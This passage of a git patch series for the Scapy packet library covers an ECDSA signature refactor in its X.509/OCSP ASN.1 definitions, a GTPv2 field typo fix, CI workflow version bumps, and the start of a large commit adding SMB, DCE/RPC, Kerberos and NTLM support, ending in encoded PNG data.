ASN1F_PACKET("signatureAlgorithm", X509_AlgorithmIdentifier(), X509_AlgorithmIdentifier), - ASN1F_BIT_STRING("signatureValue", - "defaultsignature" * 2)] + MultipleTypeField( + [ + (ASN1F_BIT_STRING_ENCAPS("signatureValue", + ECDSASignature(), + ECDSASignature), + lambda pkt: "ecdsa" in pkt.signatureAlgorithm.algorithm.oidname.lower()), # noqa: E501 + ], + ASN1F_BIT_STRING("signatureValue", + "defaultsignature" * 2))] ASN1F_SEQUENCE.__init__(self, *seq, **kargs) - def m2i(self, pkt, x): - c, s = ASN1F_SEQUENCE.m2i(self, pkt, x) - sigtype = pkt.fields["signatureAlgorithm"].algorithm.oidname - if "rsa" in sigtype.lower(): - return c, s - elif "ecdsa" in sigtype.lower(): - return ASN1F_X509_CertECDSA().m2i(pkt, x) - else: - raise Exception("could not parse certificate") - - def dissect(self, pkt, s): - c, x = self.m2i(pkt, s) - return x - - def build(self, pkt): - if "signatureAlgorithm" in pkt.fields: - sigtype = pkt.fields['signatureAlgorithm'].algorithm.oidname - else: - sigtype = pkt.default_fields["signatureAlgorithm"].algorithm.oidname # noqa: E501 - if "rsa" in sigtype.lower(): - return ASN1F_SEQUENCE.build(self, pkt) - elif "ecdsa" in sigtype.lower(): - pkt.default_fields["signatureValue"] = ECDSASignature() - return ASN1F_X509_CertECDSA().build(pkt) - else: - raise Exception("could not build certificate") - class X509_Cert(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER @@ -1121,20 +1049,6 @@ def get_issuer_str(self): return name_str -class ASN1F_X509_CRLECDSA(ASN1F_SEQUENCE): - def __init__(self, **kargs): - seq = [ASN1F_PACKET("tbsCertList", - X509_TBSCertList(), - X509_TBSCertList), - ASN1F_PACKET("signatureAlgorithm", - X509_AlgorithmIdentifier(), - X509_AlgorithmIdentifier), - ASN1F_BIT_STRING_ENCAPS("signatureValue", - ECDSASignature(), - ECDSASignature)] - ASN1F_SEQUENCE.__init__(self, *seq, **kargs) - - class ASN1F_X509_CRL(ASN1F_SEQUENCE): def __init__(self, **kargs): seq = [ASN1F_PACKET("tbsCertList", @@ -1143,37 +1057,17 @@ def __init__(self, **kargs): ASN1F_PACKET("signatureAlgorithm", X509_AlgorithmIdentifier(), X509_AlgorithmIdentifier), - ASN1F_BIT_STRING("signatureValue", - "defaultsignature" * 2)] + MultipleTypeField( + [ + (ASN1F_BIT_STRING_ENCAPS("signatureValue", + ECDSASignature(), + ECDSASignature), + lambda pkt: "ecdsa" in pkt.signatureAlgorithm.algorithm.oidname.lower()), # noqa: E501 + ], + ASN1F_BIT_STRING("signatureValue", + "defaultsignature" * 2))] ASN1F_SEQUENCE.__init__(self, *seq, **kargs) - def m2i(self, pkt, x): - c, s = ASN1F_SEQUENCE.m2i(self, pkt, x) - sigtype = pkt.fields["signatureAlgorithm"].algorithm.oidname - if "rsa" in sigtype.lower(): - return c, s - elif "ecdsa" in sigtype.lower(): - return ASN1F_X509_CRLECDSA().m2i(pkt, x) - else: - raise Exception("could not parse certificate") - - def dissect(self, pkt, s): - c, x = self.m2i(pkt, s) - return x - - def build(self, pkt): - if "signatureAlgorithm" in pkt.fields: - sigtype = pkt.fields['signatureAlgorithm'].algorithm.oidname - else: - sigtype = pkt.default_fields["signatureAlgorithm"].algorithm.oidname # noqa: E501 - if "rsa" in sigtype.lower(): - return ASN1F_SEQUENCE.build(self, pkt) - elif "ecdsa" in sigtype.lower(): - pkt.default_fields["signatureValue"] = ECDSASignature() - return ASN1F_X509_CRLECDSA().build(pkt) - else: - raise Exception("could not build certificate") - class X509_CRL(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER @@ -1231,7 +1125,7 @@ class OCSP_SingleResponse(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( ASN1F_PACKET("certID", OCSP_CertID(), OCSP_CertID), - ASN1F_PACKET("certStatus", OCSP_CertStatus(), + ASN1F_PACKET("certStatus", OCSP_CertStatus(certStatus=OCSP_GoodInfo()), OCSP_CertStatus), ASN1F_GENERALIZED_TIME("thisUpdate", ""), ASN1F_optional( @@ -1268,7 +1162,7 @@ class OCSP_ResponseData(ASN1_Packet): ASN1F_optional( ASN1F_enum_INTEGER("version", 0, {0: "v1"}, explicit_tag=0x80)), - ASN1F_PACKET("responderID", OCSP_ResponderID(), + ASN1F_PACKET("responderID", OCSP_ResponderID(responderID=OCSP_ByName()), OCSP_ResponderID), ASN1F_GENERALIZED_TIME("producedAt", str(GeneralizedTime())), @@ -1279,23 +1173,6 @@ class OCSP_ResponseData(ASN1_Packet): explicit_tag=0xa1))) -class ASN1F_OCSP_BasicResponseECDSA(ASN1F_SEQUENCE): - def __init__(self, **kargs): - seq = [ASN1F_PACKET("tbsResponseData", - OCSP_ResponseData(), - OCSP_ResponseData), - ASN1F_PACKET("signatureAlgorithm", - X509_AlgorithmIdentifier(), - X509_AlgorithmIdentifier), - ASN1F_BIT_STRING_ENCAPS("signature", - ECDSASignature(), - ECDSASignature), - ASN1F_optional( - ASN1F_SEQUENCE_OF("certs", None, X509_Cert, - explicit_tag=0xa0))] - ASN1F_SEQUENCE.__init__(self, *seq, **kargs) - - class ASN1F_OCSP_BasicResponse(ASN1F_SEQUENCE): def __init__(self, **kargs): seq = [ASN1F_PACKET("tbsResponseData", @@ -1304,40 +1181,20 @@ def __init__(self, **kargs): ASN1F_PACKET("signatureAlgorithm", X509_AlgorithmIdentifier(), X509_AlgorithmIdentifier), - ASN1F_BIT_STRING("signature", - "defaultsignature" * 2), + MultipleTypeField( + [ + (ASN1F_BIT_STRING_ENCAPS("signature", + ECDSASignature(), + ECDSASignature), + lambda pkt: "ecdsa" in pkt.signatureAlgorithm.algorithm.oidname.lower()), # noqa: E501 + ], + ASN1F_BIT_STRING("signature", + "defaultsignature" * 2)), ASN1F_optional( ASN1F_SEQUENCE_OF("certs", None, X509_Cert, explicit_tag=0xa0))] ASN1F_SEQUENCE.__init__(self, *seq, **kargs) - def m2i(self, pkt, x): - c, s = ASN1F_SEQUENCE.m2i(self, pkt, x) - sigtype = pkt.fields["signatureAlgorithm"].algorithm.oidname - if "rsa" in sigtype.lower(): - return c, s - elif "ecdsa" in sigtype.lower(): - return ASN1F_OCSP_BasicResponseECDSA().m2i(pkt, x) - else: - raise Exception("could not parse OCSP basic response") - - def dissect(self, pkt, s): - c, x = self.m2i(pkt, s) - return x - - def build(self, pkt): - if "signatureAlgorithm" in pkt.fields: - sigtype = pkt.fields['signatureAlgorithm'].algorithm.oidname - else: - sigtype = pkt.default_fields["signatureAlgorithm"].algorithm.oidname # noqa: E501 - if "rsa" in sigtype.lower(): - return ASN1F_SEQUENCE.build(self, pkt) - elif "ecdsa" in sigtype.lower(): - pkt.default_fields["signatureValue"] = ECDSASignature() - return ASN1F_OCSP_BasicResponseECDSA().build(pkt) - else: - raise Exception("could not build OCSP basic response") - class OCSP_ResponseBytes(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER diff --git a/test/scapy/layers/x509.uts b/test/scapy/layers/x509.uts index fce5496c94e..e6334faf62f 100644 --- a/test/scapy/layers/x509.uts +++ b/test/scapy/layers/x509.uts @@ -273,3 +273,10 @@ singleResponse.singleExtensions is None = OCSP class : OCSP Response reconstruction raw(response) == s += OSCP class : OSCP Response with ECDSA +response = OCSP_ResponseBytes() +assert bytes(response.signature) == b'\x03!\x00defaultsignaturedefaultsignature' +response.signatureAlgorithm.algorithm = ASN1_OID('1.2.840.10045.4.3.2') +assert bytes(response.signature) == b'\x03\t\x000\x06\x02\x01\x00\x02\x01\x00' +response = OCSP_ResponseBytes(bytes(response)) +assert isinstance(response.signature, ECDSASignature) From 0137bbbecf6fdf33bdd72ef4b54f098be9211aa9 Mon Sep 17 00:00:00 2001 From: Mark Shiryaev Date: Tue, 30 Jan 2024 19:03:10 +0300 Subject: [PATCH 1161/1632] GTPv2: Fix typo in ChargingCharacteristics (#4203) * Fix typo in ChargingCharacteristics * Add deprecated_fields to ChargingCharacteristics --- scapy/contrib/gtp_v2.py | 5 ++++- test/contrib/gtp_v2.uts | 6 +++--- 2 files changed, 7 insertions(+), 4 deletions(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index b788f3b86b4..b438c4feba1 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -1360,11 +1360,14 @@ class IE_ChargingID(gtp.IE_Base): class IE_ChargingCharacteristics(gtp.IE_Base): name = "IE Charging Characteristics" + deprecated_fields = { + "ChargingCharacteristric": ("ChargingCharacteristic", "2.6.0") + } fields_desc = [ByteEnumField("ietype", 95, IEType), ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), - XShortField("ChargingCharacteristric", 0)] + XShortField("ChargingCharacteristic", 0)] class IE_PDN_type(gtp.IE_Base): diff --git a/test/contrib/gtp_v2.uts b/test/contrib/gtp_v2.uts index e2339c8beb5..79079276862 100644 --- a/test/contrib/gtp_v2.uts +++ b/test/contrib/gtp_v2.uts @@ -347,12 +347,12 @@ ie.ietype == 94 and ie.ChargingID == 956321605 h = "3333333333332222222222228100a384080045b8011800000000fc1193150a2a00010a2a00027be5084b010444c4482000f82fd783953790a2000100080002081132547600004c0006001111111111114b000800000000000001e24056000d001832f420303932f4200001e2405300030032f4205200010006570009008a000010927f0000025700090187000010927f00000247001a001961616161616161616161616161616161616161616161616161800001000063000100014f000500017f0000034d000400000800007f00010000480008000000c3500002e6304e001a008080211001000010810600000000830600000000000d00000a005d001f00490001000750001600190700000000000000000000000000000000000000007200020014005f0002000a008e80b09f" gtp = Ether(hex_bytes(h)) ie = gtp.IE_list[18] -ie.ChargingCharacteristric == 0xa00 +ie.ChargingCharacteristic == 0xa00 = IE_ChargingCharacteristics, basic instantiation ie = IE_ChargingCharacteristics( - ietype='Charging Characteristics', length=2, ChargingCharacteristric=0xa00) -ie.ietype == 95 and ie.ChargingCharacteristric == 0xa00 + ietype='Charging Characteristics', length=2, ChargingCharacteristic=0xa00) +ie.ietype == 95 and ie.ChargingCharacteristic == 0xa00 = IE_PDN_type, dissection h = "3333333333332222222222228100a384080045b800ed00000000fc1193430a2a00010a2a00027f61084b00d91c47482000cd140339f4d99f66000100080002081132547600004b000800000000000001e24056000d001832f420303932f4200001e2405300030032f4205200010006570009008a000010927f0000025700090187000010927f00000247001a00196161616161616161616161616161616161616161616161616163000100014f000500017f0000034d0004000808000048000800000017000000a4105d002c0049000100e55700090385000010927f00000250001600580700000000000000000000000000000000000000007200020014005311004c" From 277f31e2564602685729c6d5973f881c073ab6f4 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 31 Jan 2024 12:50:27 +0100 Subject: [PATCH 1162/1632] Update github actions --- .github/workflows/unittests.yml | 28 ++++++++++++++-------------- 1 file changed, 14 insertions(+), 14 deletions(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index a02cd99ae8a..925189ec11d 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -16,9 +16,9 @@ jobs: runs-on: ubuntu-latest steps: - name: Checkout Scapy - uses: actions/checkout@v3 + uses: actions/checkout@v4 - name: Setup Python - uses: actions/setup-python@v4 + uses: actions/setup-python@v5 with: python-version: "3.12" - name: Install tox @@ -37,9 +37,9 @@ jobs: runs-on: ubuntu-22.04 steps: - name: Checkout Scapy - uses: actions/checkout@v3 + uses: actions/checkout@v4 - name: Setup Python - uses: actions/setup-python@v4 + uses: actions/setup-python@v5 with: python-version: "3.12" - name: Install tox @@ -51,9 +51,9 @@ jobs: runs-on: ubuntu-latest steps: - name: Checkout Scapy - uses: actions/checkout@v3 + uses: actions/checkout@v4 - name: Setup Python - uses: actions/setup-python@v4 + uses: actions/setup-python@v5 with: python-version: "3.12" - name: Install tox @@ -115,12 +115,12 @@ jobs: flags: " -k scanner" steps: - name: Checkout Scapy - uses: actions/checkout@v3 + uses: actions/checkout@v4 # Codecov requires a fetch-depth > 1 with: fetch-depth: 2 - name: Setup Python - uses: actions/setup-python@v4 + uses: actions/setup-python@v5 with: python-version: ${{ matrix.python }} - name: Install Tox and any other packages @@ -128,16 +128,16 @@ jobs: - name: Run Tox run: UT_FLAGS="${{ matrix.flags }}" ./.config/ci/test.sh ${{ matrix.python }} ${{ matrix.mode }} - name: Codecov - uses: codecov/codecov-action@v3 + uses: codecov/codecov-action@v4.0.0-beta.3 cryptography: name: pyca/cryptography test runs-on: ubuntu-latest steps: - name: Checkout repository - uses: actions/checkout@v3 + uses: actions/checkout@v4 - name: Setup Python - uses: actions/setup-python@v4 + uses: actions/setup-python@v5 with: python-version: "3.12" - name: Install tox @@ -157,12 +157,12 @@ jobs: security-events: write steps: - name: Checkout repository - uses: actions/checkout@v3 + uses: actions/checkout@v4 with: fetch-depth: 2 - name: Initialize CodeQL - uses: github/codeql-action/init@v2 + uses: github/codeql-action/init@v3 with: languages: 'python' - name: Perform CodeQL Analysis - uses: github/codeql-action/analyze@v2 + uses: github/codeql-action/analyze@v3 From 86e176428c55f569585890b466dbd9719c19147c Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 1 Feb 2024 11:19:04 +0100 Subject: [PATCH 1163/1632] The Windows Update (#4214) * The Windows Update This PR includes a major refactor regarding several Windows specific protocols, particularily SMB2/3 and DCE/RPC. It also touches many parts of Scapy's core in order to accommodate those changes. This includes: - DCE/RPC: - DCERPC_Client with support for NCACN_IP_TCP and NCACN_NP - DCERPC_Server with support for NCACN_IP_TCP and NCACN_NP - Finish NDR engine ! - Server/Client Endpoint mapper support - Premises of a few special clients (Netlogon, DCOM, ...) - A few RPC interfaces (to debug/test the DCE/RPC engine. TODO: MORE !) - Documentation ! - SMB2/3: - Protocol refactor, many more SMB2/3 structures supported - Server (class + 'simple' util smbserver()) (2.0.2 to 3.1.1) - Client (class + interactive CLI smbclient()) (2.0.2 only) - SMB socket, RPC over SMB socket, etc. - Documentation ! - Kerberos: - KerberosSSP to use in SMB/RPC clients/servers - Crypto: use cryptography, latest RFC8009, typing, etc. - Util functions krb_as_req, krb_tgt_req, kpasswd (both modes), etc. - [MS-KILE] variants, SFU and more ! - Both MIT and Windows variations support - NTLM: - refactor, clean SSP - remove relay (TODO: reimplement with the new system) - Extensive GSSAPI / SPNEGO support ! - Ticketer++ - CCache support: read/write - Kerberos integration: ask/renew/resign/edit tickets - Change ticket fields through a GUI ! and more ! - LDAP - Fixes, ASN.1 Windows variation support - dclocator, answering machine for "LDAP PING" - Automaton: - fixes (memory usage on Windows) - support for EOF events - spawn() mode, better socket.socket support and more ! - StreamSocket changes, support for TCP reassembly, etc ! - Unit tests for everything (using samba, etc.) * CI: remove travis and log smbclient version * Add parsing of SECURITY_DESCRIPTOR * Use UPN in NTLMSSP * Slightly more doc * More smb error handling * Minor SMB/Kerberos doc updates * Minor ticketer improvements and fixes * Conditional ACEs + SDDL * Minor SMB client API cleanups for query * Remove rfc3961 cryptography's hack for DES * Fix smbserver symlinks + smbclient guest * PEP8 * Minor doc fix * Fix wrong SPNEGO auth_type --- .config/ci/install.sh | 23 +- .config/codespell_ignore.txt | 7 +- .config/mypy/mypy.ini | 3 + .config/mypy/mypy_enabled.txt | 1 + doc/scapy/advanced_usage.rst | 4 +- .../dcerpc/ndr_conformant_varying_array.png | Bin 0 -> 16686 bytes .../graphics/dcerpc/ndr_full_pointer.png | Bin 0 -> 32661 bytes doc/scapy/graphics/kerberos/kerberos_atmt.png | Bin 0 -> 35364 bytes doc/scapy/graphics/kerberos/ticketer.png | Bin 0 -> 174507 bytes doc/scapy/graphics/ntlm/ntlmrelay_ldap.png | Bin 84711 -> 0 bytes doc/scapy/graphics/ntlm/ntlmrelay_ldaps.png | Bin 53781 -> 0 bytes doc/scapy/graphics/ntlm/ntlmrelay_smb.png | Bin 223325 -> 0 bytes doc/scapy/graphics/ntlm/ntlmrelay_smb2.png | Bin 240337 -> 0 bytes .../graphics/ntlm/ntlmrelay_smb_win1.png | Bin 64555 -> 0 bytes .../graphics/ntlm/ntlmrelay_smb_win2.png | Bin 60780 -> 0 bytes .../graphics/ntlm/ntlmrelay_smb_wireshark.png | Bin 302555 -> 0 bytes doc/scapy/graphics/smb/smb_client.png | Bin 0 -> 157304 bytes doc/scapy/graphics/smb/smb_server.png | Bin 0 -> 112485 bytes doc/scapy/layers/dcerpc.rst | 371 ++ doc/scapy/layers/kerberos.rst | 326 +- doc/scapy/layers/ntlm.rst | 129 +- doc/scapy/layers/smb.rst | 291 ++ doc/scapy/usage.rst | 7 +- scapy/__init__.py | 5 + scapy/ansmachine.py | 4 + scapy/arch/__init__.py | 18 +- scapy/arch/libpcap.py | 4 +- scapy/asn1/asn1.py | 9 + scapy/asn1/ber.py | 55 +- scapy/asn1/mib.py | 4 +- scapy/asn1fields.py | 44 +- scapy/automaton.py | 249 +- scapy/config.py | 98 +- scapy/contrib/automotive/bmw/hsfz.py | 4 +- scapy/contrib/automotive/doip.py | 4 +- scapy/error.py | 1 + scapy/fields.py | 92 +- scapy/layers/dcerpc.py | 1713 ++++++-- scapy/layers/dhcp6.py | 2 +- scapy/layers/dns.py | 42 +- scapy/layers/gssapi.py | 719 ++-- scapy/layers/http.py | 2 - scapy/layers/inet6.py | 5 + scapy/layers/kerberos.py | 2622 +++++++++++-- scapy/layers/ldap.py | 769 ++-- scapy/layers/msrpce/__init__.py | 15 + scapy/layers/msrpce/all.py | 506 +++ scapy/layers/msrpce/ept.py | 219 ++ scapy/layers/msrpce/msdcom.py | 494 +++ scapy/layers/msrpce/msnrpc.py | 445 +++ scapy/layers/{ => msrpce}/mspac.py | 346 +- scapy/layers/msrpce/raw/README.md | 3 + scapy/layers/msrpce/raw/__init__.py | 0 scapy/layers/msrpce/raw/ept.py | 126 + scapy/layers/msrpce/raw/ms_dcom.py | 165 + scapy/layers/msrpce/raw/ms_nrpc.py | 98 + scapy/layers/msrpce/raw/ms_samr.py | 117 + scapy/layers/msrpce/raw/ms_srvs.py | 189 + scapy/layers/msrpce/raw/ms_wkst.py | 146 + scapy/layers/msrpce/rpcclient.py | 600 +++ scapy/layers/msrpce/rpcserver.py | 436 +++ scapy/layers/netbios.py | 63 +- scapy/layers/ntlm.py | 1899 +++++---- scapy/layers/smb.py | 911 +++-- scapy/layers/smb2.py | 3434 +++++++++++++---- scapy/layers/smbclient.py | 1492 +++++-- scapy/layers/smbserver.py | 1809 +++++++-- scapy/layers/spnego.py | 852 ++++ scapy/layers/tls/crypto/h_mac.py | 11 + scapy/libs/rfc3961.py | 1054 +++-- scapy/main.py | 38 +- scapy/modules/ticketer.py | 2173 +++++++++++ scapy/packet.py | 18 +- scapy/sendrecv.py | 9 +- scapy/sessions.py | 88 +- scapy/supersocket.py | 69 +- scapy/themes.py | 15 +- scapy/utils.py | 217 +- test/configs/cryptography.utsc | 1 + test/pcaps/dcerpc_msnrpc.pcapng.gz | Bin 0 -> 1039 bytes test/regression.uts | 8 +- test/scapy/layers/dcerpc.uts | 558 ++- test/scapy/layers/dns.uts | 4 +- test/scapy/layers/kerberos.uts | 1406 ++++--- test/scapy/layers/ldap.uts | 57 +- test/scapy/layers/msnrpc.uts | 164 + test/scapy/layers/ntlm.uts | 431 +++ test/scapy/layers/smb.uts | 14 +- test/scapy/layers/smb2.uts | 201 +- test/scapy/layers/smbclientserver.uts | 342 ++ test/tftp.uts | 43 +- tox.ini | 8 +- 92 files changed, 23769 insertions(+), 5152 deletions(-) create mode 100644 doc/scapy/graphics/dcerpc/ndr_conformant_varying_array.png create mode 100644 doc/scapy/graphics/dcerpc/ndr_full_pointer.png create mode 100644 doc/scapy/graphics/kerberos/kerberos_atmt.png create mode 100644 doc/scapy/graphics/kerberos/ticketer.png delete mode 100644 doc/scapy/graphics/ntlm/ntlmrelay_ldap.png delete mode 100644 doc/scapy/graphics/ntlm/ntlmrelay_ldaps.png delete mode 100644 doc/scapy/graphics/ntlm/ntlmrelay_smb.png delete mode 100644 doc/scapy/graphics/ntlm/ntlmrelay_smb2.png delete mode 100644 doc/scapy/graphics/ntlm/ntlmrelay_smb_win1.png delete mode 100644 doc/scapy/graphics/ntlm/ntlmrelay_smb_win2.png delete mode 100644 doc/scapy/graphics/ntlm/ntlmrelay_smb_wireshark.png create mode 100644 doc/scapy/graphics/smb/smb_client.png create mode 100644 doc/scapy/graphics/smb/smb_server.png create mode 100644 doc/scapy/layers/dcerpc.rst create mode 100644 doc/scapy/layers/smb.rst create mode 100644 scapy/layers/msrpce/__init__.py create mode 100644 scapy/layers/msrpce/all.py create mode 100644 scapy/layers/msrpce/ept.py create mode 100644 scapy/layers/msrpce/msdcom.py create mode 100644 scapy/layers/msrpce/msnrpc.py rename scapy/layers/{ => msrpce}/mspac.py (66%) create mode 100644 scapy/layers/msrpce/raw/README.md create mode 100644 scapy/layers/msrpce/raw/__init__.py create mode 100644 scapy/layers/msrpce/raw/ept.py create mode 100644 scapy/layers/msrpce/raw/ms_dcom.py create mode 100644 scapy/layers/msrpce/raw/ms_nrpc.py create mode 100644 scapy/layers/msrpce/raw/ms_samr.py create mode 100644 scapy/layers/msrpce/raw/ms_srvs.py create mode 100644 scapy/layers/msrpce/raw/ms_wkst.py create mode 100644 scapy/layers/msrpce/rpcclient.py create mode 100644 scapy/layers/msrpce/rpcserver.py create mode 100644 scapy/layers/spnego.py create mode 100644 scapy/modules/ticketer.py create mode 100644 test/pcaps/dcerpc_msnrpc.pcapng.gz create mode 100644 test/scapy/layers/msnrpc.uts create mode 100644 test/scapy/layers/ntlm.uts create mode 100644 test/scapy/layers/smbclientserver.uts diff --git a/.config/ci/install.sh b/.config/ci/install.sh index 16ef0075393..11b6fcc3415 100755 --- a/.config/ci/install.sh +++ b/.config/ci/install.sh @@ -14,7 +14,7 @@ then fi # Install on osx -if [ "${OSTYPE:0:6}" = "darwin" ] || [ "$TRAVIS_OS_NAME" = "osx" ] +if [ "${OSTYPE:0:6}" = "darwin" ] then if [ ! -z $SCAPY_USE_LIBPCAP ] then @@ -23,13 +23,14 @@ then fi fi -# Install wireshark data, ifconfig & vcan -if [ "$OSTYPE" = "linux-gnu" ] || [ "$TRAVIS_OS_NAME" = "linux" ] +# Install wireshark data, ifconfig, vcan, samba +if [ "$OSTYPE" = "linux-gnu" ] then sudo apt-get update sudo apt-get -qy install tshark net-tools || exit 1 sudo apt-get -qy install can-utils || exit 1 sudo apt-get -qy install linux-modules-extra-$(uname -r) || exit 1 + sudo apt-get -qy install samba smbclient # Make sure libpcap is installed if [ ! -z $SCAPY_USE_LIBPCAP ] then @@ -37,16 +38,16 @@ then fi fi -# On Travis, "osx" dependencies are installed in .travis.yml -if [ "$TRAVIS_OS_NAME" != "osx" ] -then - # Update pip & setuptools (tox uses those) - python -m pip install --upgrade pip setuptools --ignore-installed +# Update pip & setuptools (tox uses those) +python -m pip install --upgrade pip setuptools wheel --ignore-installed - # Make sure tox is installed and up to date - python -m pip install -U tox --ignore-installed -fi +# Make sure tox is installed and up to date +python -m pip install -U tox --ignore-installed # Dump Environment (so that we can check PATH, UT_FLAGS, etc.) openssl version +if [ "$OSTYPE" = "linux-gnu" ] +then + smbclient -V +fi set diff --git a/.config/codespell_ignore.txt b/.config/codespell_ignore.txt index f425573c7ee..ecb75fe7cdc 100644 --- a/.config/codespell_ignore.txt +++ b/.config/codespell_ignore.txt @@ -1,12 +1,14 @@ aci ans -archtypes applikation +archtypes ba +browseable byteorder cace cas componet +comversion cros delt doas @@ -18,8 +20,9 @@ funktion gost hart iff -interaktive +implementors inout +interaktive microsof mitre nd diff --git a/.config/mypy/mypy.ini b/.config/mypy/mypy.ini index ef0f74b2849..7b17578099d 100644 --- a/.config/mypy/mypy.ini +++ b/.config/mypy/mypy.ini @@ -6,6 +6,9 @@ ignore_errors = True ignore_missing_imports = True +[mypy-scapy.libs.rfc3961] +warn_return_any = False + # Layers specific config [mypy-scapy.arch.*] diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 076316559bc..fda3f8e33c9 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -95,6 +95,7 @@ scapy/libs/__init__.py scapy/libs/ethertypes.py scapy/libs/extcap.py scapy/libs/matplot.py +scapy/libs/rfc3961.py scapy/libs/structures.py scapy/libs/test_pyx.py diff --git a/doc/scapy/advanced_usage.rst b/doc/scapy/advanced_usage.rst index edc2b76c19c..29053c10561 100644 --- a/doc/scapy/advanced_usage.rst +++ b/doc/scapy/advanced_usage.rst @@ -730,9 +730,9 @@ The ``START`` event is ``initial=1``, the ``STOP`` event is ``stop=1`` and the ` Decorators for transitions ~~~~~~~~~~~~~~~~~~~~~~~~~~ -Transitions are methods decorated by the result of one of ``ATMT.condition``, ``ATMT.receive_condition``, ``ATMT.timeout``, ``ATMT.timer``. They all take as argument the state method they are related to. ``ATMT.timeout`` and ``ATMT.timer`` also have a mandatory ``timeout`` parameter to provide the timeout value in seconds. The difference between ``ATMT.timeout`` and ``ATMT.timer`` is that ``ATMT.timeout`` gets triggered only once. ``ATMT.timer`` get reloaded automatically, which is useful for sending keep-alive packets. ``ATMT.condition`` and ``ATMT.receive_condition`` have an optional ``prio`` parameter so that the order in which conditions are evaluated can be forced. The default priority is 0. Transitions with the same priority level are called in an undetermined order. +Transitions are methods decorated by the result of one of ``ATMT.condition``, ``ATMT.receive_condition``, ``ATMT.eof``, ``ATMT.timeout``, ``ATMT.timer``. They all take as argument the state method they are related to. ``ATMT.timeout`` and ``ATMT.timer`` also have a mandatory ``timeout`` parameter to provide the timeout value in seconds. The difference between ``ATMT.timeout`` and ``ATMT.timer`` is that ``ATMT.timeout`` gets triggered only once. ``ATMT.timer`` get reloaded automatically, which is useful for sending keep-alive packets. ``ATMT.condition`` and ``ATMT.receive_condition`` have an optional ``prio`` parameter so that the order in which conditions are evaluated can be forced. The default priority is 0. Transitions with the same priority level are called in an undetermined order. -When the automaton switches to a given state, the state's method is executed. Then transitions methods are called at specific moments until one triggers a new state (something like ``raise self.MY_NEW_STATE()``). First, right after the state's method returns, the ``ATMT.condition`` decorated methods are run by growing prio. Then each time a packet is received and accepted by the master filter all ``ATMT.receive_condition`` decorated hods are called by growing prio. When a timeout is reached since the time we entered into the current space, the corresponding ``ATMT.timeout`` decorated method is called. +When the automaton switches to a given state, the state's method is executed. Then transitions methods are called at specific moments until one triggers a new state (something like ``raise self.MY_NEW_STATE()``). First, right after the state's method returns, the ``ATMT.condition`` decorated methods are run by growing prio. Then each time a packet is received and accepted by the master filter all ``ATMT.receive_condition`` decorated hods are called by growing prio. When a timeout is reached since the time we entered into the current space, the corresponding ``ATMT.timeout`` decorated method is called. If the socket raises an ``EOFError`` (closed) during a state, the ``ATMT.EOF`` transition is called. Otherwise it raises an exception and the automaton exits. :: diff --git a/doc/scapy/graphics/dcerpc/ndr_conformant_varying_array.png b/doc/scapy/graphics/dcerpc/ndr_conformant_varying_array.png new file mode 100644 index 0000000000000000000000000000000000000000..5480c2d0d1b94f764d946823e2524bc57f85be23 GIT binary patch literal 16686 zcmd74V{~Ru5I*?EwllFgv7NlJoryWIZQIUFGO=yjwr$(a=J!AA-LqeIKkWT*&#lva zySwUicircyx*e_{CyoG%3kv`M5F{mlN&o=J^Y?QYH01Xk&im!R0&quRNfqet%M02# z>|4fh64h{0w*BqoYT#f3FtxF@HlcSkaxgKmaWu1ax&rIs|E@&+UnLO-69Xr6TN@%3 zb88cTm9x!HA|@sx3ukkypG3@z%*@{sHw!B_8xy6NPc{HR1ds#@skmiaY`AKpt1m%a zZ%tm#3Pt#Zq5oiKeAEqqXd6UDctrhC)1L+|jjGK0+E1W$K1cx97zSY^LMAqVhzS%0 z0XcDAamW>1aARIsOj^B|c!+5Y<3m3Br(Z5Zg!wEi5c- zv<)?iX%L%MN7!B6@B6{1AQp|+D2l1jpRZoChTL)aLAdc#ar-cCCp<@c>exfOY4&-sqPj+7f+=6PC>qU9y& z?j{>}f5~Xu?_|y0KP%Xua~MHG{5>&}dDVwL;FmgZR96-?sBuZI5ZFe^ku*%`C;@z} z^(P3aHyhKRh;heQL5!hm%MC69mlUGAGm&B%)nyFtz8bJs;3)T66Ws|g(K!f26Q;xz zR?wj}2F&>trbah*AW(-U)EtelkCT6cS!ODB8VB(IIgPdr5Q1W$ijWd5y9%Xm{>0v@ z;JYM3@ewjmSYHXwdR!M(+9z!{s|U2bzV3wpkhQ`mk4EJ(X1n!K5O@FDwoiq9sW0G0Tqfn`Mm zJA(r`G9ILX=}r&M)?2E11LFQriazsInsTjqz>yl>;D1fVL$f;{?CXa7H~&VHb|1yc z;mpEq7xB9P>?OukTM`DS01$taLdA1*;c$2*dtJs=^G zVO|-N@`;HlT)E3^i-}yE(j+T1pZUnky;B zL7H?GAU~35sXf9nw&j7IOmfsQ6?xP+0!yrzaZ%yUU3SazO)y(OM3T`!9B%kgP6=bB zL0~{1YBW^=%6F~20OdJ;@#%H^=Uz>1K`ynF<|Q1X13{?6#|BsiisPPn-nT5WhPJ${ z@R_y!OnELfc{gmC4BKT&=0CY%<`RO^-EWMZK*!jHvfq1-5U_& z!r!*Ywj09M*3DC|r=c5qeXSb6lSu>j<$z*xh87{T&1S33|IR|u`V}6j?zK%gi8MYU z7i<=5%jDe$;pXYt_cqD~F19`p0>L9?i&1k_^ZU+s7`p@=EzEK=)&BV?-0tg+r1JSW zb+c6?-h9|V#9fK_cAgn8rYSU7bg_%}`u!MG#uOpPv_j(wNRSL-KG8Btiv#8_x%JUqn0wwNYp&WX>Ljha8pD 